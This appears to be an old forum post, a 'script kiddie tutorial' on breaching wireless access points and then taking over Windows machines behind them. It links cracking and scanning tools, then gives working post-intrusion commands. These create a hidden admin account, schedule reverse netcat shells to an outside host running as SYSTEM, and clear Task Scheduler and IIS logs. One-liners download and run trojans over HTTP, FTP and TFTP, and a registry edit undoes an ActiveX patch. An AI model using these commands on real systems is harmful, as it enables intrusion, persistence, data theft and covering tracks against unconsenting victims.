Would anyone like to constructively critique this Holy script kiddie tutorial that I conjured up... I'm trying to explain the methods involved and the step by step procedures that aids an attacker on breaching a wireless access point and the mystical network that Lay'th behind it.
Yes, there is mad cut & paste going on... but, I really don't care about being flamed for script kiddie shit... I'm learning the methods granted to me under the White-Hat act of 1776.. Meaning, I've gotta plan...
Credit given where known...
Legal shit: I'm just trying to learn the methods of an attacker.... Please do not try this at home...
NoDice
Crack WEP in 10 mins....
http://www.hackingdefined.com/movies/whax-aircrack-wep.html
URL: http://www.crimemachine.com/Tuts/Flash/wepcracking.html
Or
Crack WPA...
# URL: http://www.crimemachine.com/Tuts/Flash/WPA.html
# Download : http://www.crimemachine.com/Tuts/Flash/WPA.swf
Tools:
Auditor @ http://new.remote-exploit.org/index.php/Auditor_mirrors
WHAX @ http://ftp.rz.tu-bs.de/pub/mirror/ftp.whop...-3.0-200705.iso
MD5sum @ http://www.iwhax.net/whax-3.0-200705.md5.txt
Metasploit @ http://www.metasploit.com/projects/Framework/downloads.html
Win32 Cygwin Installer for Windows.
After you connect to the router:
You'll have to scan for vulnerabilities... Using any one of these tools:
Xscan -- http://www.xfocus.org/programs/200507/18.html
Tenable Newt - Nessus For Windows -- http://www.tenablesecurity.com/products/newt.shtml
Others:
Shadow
Retina
ISS
GFi
Nikto - Cgi
Use Metasploit to attack the exploit <<< Gain root <<<<
Metasploit Documentation -- http://www.metasploit.com/projects/Framewo...umentation.html
Here are some CMD quickies --
A handy collection of command line tools
cpuinfo.exe - gets the processor type and CPU clocking speed (mhz)
fport.exe - shows open ports and the process that owns the port
iplist.exe - enumerates the ip's of the computer
md5.exe - gets the md5 hash of a file
pw2kget.exe - for win2k gets the password of the currently logged on user
pwreveal.exe - gets the passwords of any window that has a ****** editbox
regshell.exe - a commandline registry explorer/editor
resolve.exe - a commandline URL resolver
sendmail.exe - a commandline email sender
uptime.exe - gets the machines current uptime
xwhois - advanced whois lookup
Screencap.exe - makes a screenshot of the screen and saves it to screenshot.bmp
CMDget.exe - Downloads a file from a website from user provided parameters
webscr.exe - creates a snapshot from the webcam and saves it
shutd.exe - program that forces shutdown/reboot of machine
bnc.exe - bnc for windows (see bnc.cfg)
clslog.exe - clears app/security/system logs XP/NT/2k
enum.exe - enumerates IPC$ share to collect information
winfo.exe - enumerates IPC$ share to collect information
FTPd.exe - small ftp server for dos (see slimftpd.conf)
Global.exe - process dos command on all disc/subdirs
iCmd.exe - telnet server 98/xp/nt/2k
iislog.exe - clears IIS logs
Info.exe - gets system information
ispc.exe - spawns shell on hacked IIS (put idq.dll on remote script dir)
nc.exe - netcat
pv.exe - process manager for dos
Pwdump.exe - dumps SAM hashes
scrnmode.exe - change screen mode from dos
unrar.exe - unrar for dos
wget.exe - wget for windows
wizmo.exe - command tool (see w.txt)
dwpp.exe - dial up password graber
winrelay.exe - relay tcp/udp connections
getad.exe - escalate to admin user in w2k
pipeup.exe - escalate to admin user in w2k
dnsid - identify remore dns server
rinetd.exe see rinetd.txt
Some tricks once you gain a remote shell:
So you got a command shell prompt with your '0day s00p3r h4x0rin .c skrypt'
and you dont know what the (filtered) a command prompt is cuz you don't know shit about DOS
and cant do anything without a pretty point-n-click GUI interface. and need to get your
UPX/hex-edited/undetected s00per trojan loaded onto it and be a real hax0r.
+++ r00tin' NT
- 0x01. The Basics
+ What are net commands?
+ What are some net commands?
+ What is NetBIOS?
+ Creating a local admin account.
+ How to transfer files to and from.
+ How do I execute those files remotely?
0x01. The Basics - What are net commands?
`````````````````````````````````````````
What are net command exactly? Net commands are commands used in order to show information regarding
a server or network which can include information on the servers, networks, shares, and connections.
Other commands include commands in which you can edit user accounts, groups, and other configuration
types.
0x01. The Basics - What are some net commands?
``````````````````````````````````````````````
What are some net commands? There are various net commands in which you can use to view server info.
Some of these net commands would include the ever popular NET use, NET share and NET view. But these
arent the only net commands available. There is a wide variety of net command and they are as followed:
- NET Accounts - NET Print
- NET Computer - NET Send
- NET Config Server - NET Session
- NET Config Workstation - NET Share
- NET Continue - NET Statistics Server
- NET File - NET Statistics Workstation
- NET Group - NET Stop
- NET Help - NET Time
- NET Helpmsg - NET Use
- NET Localgroup - NET User
- NET Name - NET Ver
- NET Pause - NET View
Net commands are great ways to spy on hacked windows NT servers because your checking on the network's
status. The most widely used net commands in NT hacking are NET View, NET Share, and NET Use because they
each do a certain thing which can be used for attacking. NET View, which is used to display a list of
resources being shared on the attacked computer, NET Share which will display a list of information about
all the resources that are being shared on the attacked computer which can also be used to create network
shares, and last but not least NET Use which will display a list of connected computers which also has
options for connecting and disconnecting from previously made shares. With those 3 commands, you have the
ability to be able to do an attack called NetBIOS hacking.
0x01. The Basics - Creating a local admin account and a backup shell.
``````````````````````````````````````````````````
First off i always start off with making myself an admin on the computer just in case the shell is lost.
Add your name to admin group:
net user [username] [password] /add
net localgroup administrators [username] /add
( C:\WINNT\System32>net user GOD 0wned /add )
( C:\WINNT\System32>net localgroup administrators GOD /add )
***From muts from whitehat.co.il 8/19/04 *************************************************************
Once I had the shell, I had to create some "Backup Shells" in case the connection gets severed.
There's nothing worse than losing the only single connection to a penetrated machine.
I did this using the "at" command, sending myself a NetCat shell every 15 minutes.
I found myself smiling every 15 minutes.
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS>time
time
The current time is: 0:18:13.01
Enter the new time:
C:\WINDOWS>at 0:19 ""nc.exe -v illmob.reversedns.com 443 -d -e cmd.exe""
at 0:19 ""nc.exe -v illmob.reversedns.com 443 -d -e cmd.exe""
Added a new job with job ID = 1
********************************************************************************
*******************
2nd way .. does the same thing but more complicated
**** added 6/20/05
rename your nc.exe to services.exe (services.exe cannot be killed by anyone . )
C:\>echo services.exe -v illmob.reversedns.com 443 -L -d -e cmd.exe >c:\netcat.cmd
C:\>schtasks /create /tn rb /tr "c:\netcat.cmd" /sc minute /mo 1 /ru Administrator /rp p455w0rd && schtasks /change /tn rb /ru ""
SUCCESS: The scheduled task "rb" has successfully been created.
INFO: The run as user name for the scheduled task "rb" will be changed to "NT AUTHORITY\SYSTEM".
SUCCESS: The parameters of scheduled task "rb" have been changed.
u got a reverse connecting netcat shell that runs as SYSTEM and cannot be killed
*WARNING*
with both type make sure you clean up behind you
C:\>net stop "Task Scheduler"
C:\>del %SystemRoot%\SchedLgU.Txt
C:\>net start "Task Scheduler"
0x01. The Basics - How to transfer files to and from.
`````````````````````````````````````````````````````
Now's a good time to transfer some files
here are some good methods of transferring files that i use:
1. Open the c: drive up for file sharing/transferring
C:\>NET SHARE shareME=C:
which u can connect to in your browser window \\(consenting) computer\shareME
or type in YOUR dos prompt
c:>NET USE x: \\(consenting) computer\shareME /user:GOD
2. TFTP transfers (u need to have a TFTP server running on your computer)
http://www.solarwinds.net/Tools/Free_tools/TFTP_Server/
TFTP [-i] YOURIP [GET | PUT] source [destination]
C:\WINNT\SYSTEM32>TFTP -i 127.0.0.1 GET SAM c:\rootedSAMS
3. from a command prompt echo ftp commands into a .bat file and execute it
echo user <USERNAME> >>c:\$.tmp
echo <PASSWORD> >>c:\$.tmp
echo lcd c:\windows >>c:\$.tmp
echo binary >>c:\$.tmp
echo get <FILENAME.EXE> >>c:\$.tmp
echo quit >>c:\$.tmp
ftp -v -i -n -s:c:\$.tmp <FTP SITE> c:\$$.tmp
<FILENAME.EXE>
del c:\$.tmp
del c:\$$.tmp
4. i have created a commandline webdownloader which allows you to grab a file from a website and execute it
its more reliable when transferring files (ftp server have timeouts , TFTP uses UDP packets so it fails alot)
http://illmob.org/files/illmob/cmdget.zip
u need to get it on the server.exe using the above choices then you can use it normally
cmdget http://blah.com/trojan.exe c:\0wned.exe
well how would i get your exe onto the hacked server illwill u dumbass you might ask
well you could use this program brainbuster made...basically its a gui front-end to create a debug script
that you can paste into a shell line by line that will create a bat file that will re-compile the script into .exe
http://illmob.org/files/0day/exe2txt.zip
***Added from 101 on GSO forums 5/31/04
A small tip now if you wanna use secureCRT in listening mode to be able then to copy paste the huge .txt without problems:
-*example*-
your localip = 192.168.0.2
run a listening netcat1 : nc.exe -vv -L -p 12345 -t -e cmd.exe -s 192.168.0.2
With SecureCRT , do a simple telnet connection on 192.168.0.2:12345
(youll have a shell of course on your own computer trough securecrt)
Open now another listening netcat2 through this local sCRT shell, you'll be able
finally to copy paste this huge txt if a (consenting) computer spawn a shell to this netcat2
*****
*i would also recommend dropping a copy of netcat onto the server because you can do a shitload of stuff with it
like file transfers .. you would start nc listening on a port and then on your computer
c:\>nc (vic_ip) (vic_port) < file.exe
-------------------- SNIP----------------------
echo Dim HTTPGET >>c:\dl.vbs && echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>c:\dl.vbs && echo HTTPGET.Open "GET", "http://www.illmob.org/test.exe", false >>c:\dl.vbs && echo HTTPGET.Send >>c:\dl.vbs && echo DataBin = HTTPGET.ResponseBody >>c:\dl.vbs && echo Const adTypeBinary=1 >>c:\dl.vbs && echo Const adSaveCreateOverWrite=2 >>c:\dl.vbs && echo Dim SendBinary >>c:\dl.vbs && echo Set SendBinary = CreateObject("ADODB.Stream") >>c:\dl.vbs && echo SendBinary.Type = adTypeBinary >>c:\dl.vbs && echo SendBinary.Open >>c:\dl.vbs && echo SendBinary.Write DataBin >>c:\dl.vbs && echo SendBinary.SaveToFile "c:\test.exe", adSaveCreateOverWrite >>c:\dl.vbs && cscript //Nologo /B c:\dl.vbs && start c:\test.exe && del /s c:\dl.vbs
------------------END SNIP----------------------
oh they patched their system for the adodb stream? ha!
just paste this simple in the shell first
and youll be able to do it in no time
-------------------- SNIP----------------------
echo Windows Registry Editor Version 5.00 >>c:\fix.reg && echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}] >>c:\fix.reg && echo "Compatibility Flags"=- >>c:\fix.reg && regedit /s c:\fix.reg
------------------END SNIP----------------------
Method #2 ftp downloading
change the ftp.blah.com to the own ftp+dir and add your username/pass
-------------------- SNIP----------------------
echo user USERNAME >>c:\$.tmp && echo PASS >>c:\$.tmp && echo binary >>c:\$.tmp && echo get test.exe >>c:\$.tmp && echo quit >>c:\$.tmp && ftp -v -i -n -s:c:\$.tmp ftp.blah.com c:\$$.tmp && start c:\test.exe && del c:\$.tmp && del c:\$$.tmp
------------------END SNIP----------------------
Method #3 tftp downloading
you need a tftp server running on yourself
change the yourserver.com to your ip or dns name
-------------------- SNIP----------------------
tftp -i yourserver.com get yourfile.exe && start yourfile.exe
------------------END SNIP----------------------
0x01. The Basics - How do I execute those files remotely?
`````````````````````````````````````````````````````````
Having trouble trying to execute files remotely?
Try PSEXEC http://www.sysinternals.com/ntw2k/freeware/psexec.shtml/
psexec -u [username] -p [password] [command]
if I created a user "GOD" with the password "0wn3d"
C:\>psexec -u GOD -p 0wn3d blah.exe
or if you wanna have their TFTP connect back to u and retrieve a file
c:\>psexec -u GOD -p 0wn3d "tftp -i 127.0.0.1 get trojan.exe"
NOTE: Psexec will only work if you add an administrator user first,
and if the computer doesnt have remote administrating disabled,
or one of the ports firewalled out.
or try RemoExec http://securityfriday.com/ToolDownload/Rem...emoxec_doc.html
Remoxec executes a program using DCOM. Just supply an IP,USER,PASS,and the EXE you wanna execute.
Credit - illwill
Need to puff puff a lil'bit over here.....
«·´`·.(*·.¸(`·.¸ ¸.·´)¸.·*).·´`·»
«·´¨*·.¸¸.*Kiddie*.¸¸.·´`·»
«·´`·.(¸.·´(¸.·* *·.¸)`·.¸).·´`·»
